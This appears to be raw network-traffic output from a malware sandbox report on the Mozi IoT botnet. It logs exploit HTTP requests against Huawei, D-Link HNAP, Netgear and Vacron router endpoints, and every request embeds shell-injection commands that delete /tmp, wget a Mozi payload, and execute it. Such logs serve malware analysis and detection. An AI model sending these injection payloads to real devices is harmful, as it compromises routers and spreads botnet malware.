6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 88.54.117.228:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 115.106.3.245:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 116.166.74.245:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.119.7.37:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 188.195.245.36:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 156.90.240.187:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.142.208.105:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
